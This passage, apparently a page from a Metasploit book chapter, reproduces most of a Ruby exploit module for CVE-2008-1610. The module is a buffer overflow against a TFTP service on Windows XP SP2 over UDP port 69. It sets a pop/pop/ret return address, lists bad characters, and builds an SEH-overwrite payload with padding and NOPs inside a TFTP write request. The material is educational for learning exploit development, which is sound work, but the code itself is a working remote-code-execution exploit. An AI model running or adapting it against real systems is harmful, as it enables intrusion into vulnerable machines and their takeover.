232
Chapter 15
'Author' => 'Your Name',
'Version' => '$Revision: 7724 $',
'References' =>
[
['CVE', '2008-1610'],
['OSVDB', '43784'],
['URL', 'http://www.exploit-db.com/exploits/5315'],
],
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
},
'Payload' =>
{
'Space' => 412,
'BadChars' => "\x00\x20\x0a\x0d",
'StackAdjustment' => -3500,
},
'Platform' => 'win',
'Targets' =>
[
[ 'Windows XP SP2', { 'Ret' => 0x74d31458 } ],
# p/p/r oledlg
],
'Privileged' => true,
'DefaultTarget' => 0,
'DisclosureDate' => 'Mar 3 2008'))
register_options([Opt::RPORT(69)], self.class)
end
def exploit
connect_udp
print_status("Trying target #{target.name}...")
evil = rand_text_alpha_upper(1019)
evil << generate_seh_payload(target.ret)
evil << make_nops(16)
sploit = "\x00\x02"
sploit << "pwnd"
sploit << "\x00"
sploit << evil
sploit << "\x00"
udp_sock.put(sploit)
disconnect_udp
end
end